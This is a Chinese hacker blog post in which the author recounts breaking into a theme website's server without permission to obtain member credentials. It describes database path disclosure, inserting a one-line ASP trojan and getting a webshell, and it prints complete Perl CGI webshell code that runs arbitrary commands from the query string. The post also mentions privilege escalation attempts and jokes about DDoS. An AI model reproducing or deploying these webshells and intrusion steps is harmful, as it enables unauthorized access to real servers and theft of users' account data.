信息来源:邪恶八进制信息安全团队(
www.eviloctal.com)
昨天想好好的美化一下自己的电脑,因此就去搜了一些关于win主题风格,图标的网站,结果要注册。没办法想强行进入看看能得到注册会员的账号密码吧或者如果在这个服务器里有所要的东西就直接下载,通过旁注是进去了。
第一步:
http://XXX/anju_house%5csub_hack.asp?id=280
Microsoft JET Database Engine 错误 '80004005'
'D:\wwwroot\qzjjfc\efang\efwmanager\mdb\view.asp'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/house/conn.asp,行5
暴库,出来数据库路径,浏览
http://XXX.com/efang/efwmanager/mdb/view.asp 看样子可以插入一句话木马<%execute request("value")%> (因为显示很多内容,如果在数据库中建表,假设表中一字段名为skytear,在表名建一个字段,添加<% %> 中间内容无所谓,只要是错误信息就可以,因为<%%>会被解释之间的代码,结果会出错,这样就可以防止被下载,对插入一句话木马也不起作用)
第二步:得到webshell,通过whois.webhosting.info得到其他站的信息,有的得到web的物理路径,但是就跳不进去,经测试只有c:\winnt\system32\inetsrv\具有浏览权限,但是无法上传。通过网上的提权方法也没成功。执行CMD也没权限。没办法自己传了一个CMD到web里,也只能执行一些基本命令,通过命令path得到信息:
PATH=C:\Perl\bin\;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
服务器装了Perl,跳到C:\Perl\bin\
正准备用Perl的wenshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Cant redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
提权,
如果真的这样顺利进行下去或者没办法提权而放弃就不会写这文章了。
郁闷就郁闷在。。。。。。。
~~唉,怪自己执行了一个命令,一直郁闷到现在,已经没心情在想办法提权了,我执行了ping 我的IP -t,后悔呀,我就纳闷了当时自己为什么加-t 这个参数?!突然天网防火墙开始报警了,准确地说是不停的报警,直到现在也是。
唉!郁闷的心情难以言表,在webshell里怎么执行Ctrl+C呢??自己水平也不行,删除那个CMD肯定删除不了,提权后再结束那个ping进程是可能的,但是...唉。。心烦不想再提权了,至少今天不想尝试了。要不用DDOS?!~呵呵,有点不好意思。要不咱厚着脸皮给人家服务器提供商打个电话:P 唉,算了,我忍了。不就是死亡之ping吗,偶又不是猫上网,ping不死的,让防火墙拦截去吧。
哪位仁兄知道如何用webshell结束那个进程,或者其他方法,请赐教,偶请他吃KFC 呵呵。
再去问问朋友,看看有什么办法。闪人```````防火墙"嘟嘟"的叫声加上音乐的节奏确实效果很不错,不信你试试:P
